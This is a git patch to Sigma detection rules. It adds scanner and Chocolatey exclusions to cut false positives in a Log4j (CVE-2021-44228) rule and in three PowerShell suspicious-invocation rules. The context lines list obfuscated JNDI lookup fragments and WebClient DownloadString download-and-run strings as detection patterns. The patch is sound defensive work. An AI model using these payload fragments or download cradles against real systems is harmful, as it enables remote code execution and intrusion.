From 35d4c8bc69c9796b0ee52cbb92edd2d1309bd667 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 21 Feb 2022 10:15:27 +0100 Subject: [PATCH] fix: FPs noticed in THOR testing --- rules/web/web_cve_2021_44228_log4j.yml | 5 ++++- .../powershell_suspicious_invocation_specific.yml | 3 ++- .../posh_pm_suspicious_invocation_specific.yml | 6 ++++-- .../posh_ps_suspicious_invocation_specific.yml | 3 ++- 4 files changed, 12 insertions(+), 5 deletions(-) diff --git a/rules/web/web_cve_2021_44228_log4j.yml b/rules/web/web_cve_2021_44228_log4j.yml index e53a08ec5..4fc937707 100644 --- a/rules/web/web_cve_2021_44228_log4j.yml +++ b/rules/web/web_cve_2021_44228_log4j.yml @@ -42,7 +42,10 @@ detection: - '${${lower:j}ndi:' - '${${upper:j}ndi:' - '${${::-j}${::-n}${::-d}${::-i}:' - condition: keywords + filter: + - 'w.nessus.org/nessus' + - '/nessus}' + condition: keywords and not filter falsepositives: - Vulnerability scanning level: high diff --git a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml index acfadcb11..657b72ca9 100644 --- a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml +++ b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml @@ -7,7 +7,7 @@ tags: - attack.t1059.001 author: Florian Roth (rule), Jonhnathan Ribeiro date: 2017/03/05 -modified: 2022/02/16 +modified: 2022/02/21 logsource: product: windows service: powershell @@ -54,6 +54,7 @@ detection: filter_chocolatey: - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" - "(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')" + - 'Write-ChocolateyWarning' condition: (all of convert_b64 or all of iex_selection or all of enc_selection or all of reg_selection or all of webclient_selection or all of iex_webclient) and not 1 of filter_* falsepositives: - Penetration tests diff --git a/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml index fbaf6fd1a..0712ad64f 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml @@ -10,7 +10,7 @@ tags: - attack.t1059.001 author: Florian Roth (rule), Jonhnathan Ribeiro date: 2017/03/05 -modified: 2022/02/11 +modified: 2022/02/21 logsource: product: windows category: ps_module @@ -61,7 +61,9 @@ detection: - 'Net.WebClient' - '.Download' filter_chocolatey: - ContextInfo|contains: "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" + ContextInfo|contains: + - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" + - 'Write-ChocolateyWarning' condition: 1 of selection* and not 1 of filter* falsepositives: - Penetration tests diff --git a/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml index 4aa90b4d9..c97078d90 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml @@ -10,7 +10,7 @@ tags: - attack.t1059.001 author: Florian Roth (rule), Jonhnathan Ribeiro date: 2017/03/05 -modified: 2022/02/16 +modified: 2022/02/21 logsource: product: windows category: ps_script @@ -64,6 +64,7 @@ detection: ScriptBlockText|contains: - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" - "(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')" + - 'Write-ChocolateyWarning' condition: 1 of select* and not 1 of filter* falsepositives: - Penetration tests